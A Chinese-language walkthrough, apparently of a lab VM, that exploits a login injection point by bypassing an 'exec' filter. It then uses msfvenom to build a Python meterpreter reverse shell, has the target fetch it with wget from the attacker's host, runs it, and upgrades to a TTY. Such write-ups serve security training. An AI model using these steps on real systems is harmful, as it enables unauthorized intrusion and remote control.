主机:192.168.136.133
靶机:192.168.136.138
先用nmap、nikto扫一波发现存在漏洞
登陆网址,打开robots链接,发现反爬目录/spukcab
接着在扫描得到的两个index文件,一个一个打开。发现有它给出的漏洞执行代码,我们去利用它
接下来打开主页面,在登陆哪里发现可注入点
将给出的代码复制进去
发现代码中exec被过滤,试将大写看看能不能绕过
绕过但是却没有执行,可能是格式有误,我们加一个!号。
发现成功,代码被执行
接下来制作shell,利用漏洞上传shell脚本反弹shell。使用msfvenom制作shell.py。
https://www.jianshu.com/p/dee2b171a0a0的msfvenom基本使用
将shell.py移到apache的主目录。即/var/www/html下。
打开apache服务
开启 metasploit
利用exploit/multi/handler板块开启监听
模块下payload python/meterpreter/reverse_tcp
设置返回地址为主机地址并run
返回注入页面,下载shell.py文件
wget http://192.168.136.133 /shell.py
给文件shell提权
chmod 777 shell.py
执行shell.py文件,返回shell。
python shell.py
回到终端,可以看到反弹shell成功。
进入shell
进行shell页面优化,python -c “import pty;pty.spawn(’/bin/bash’)” (简单的shell转换成为完全交互式的tty)
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
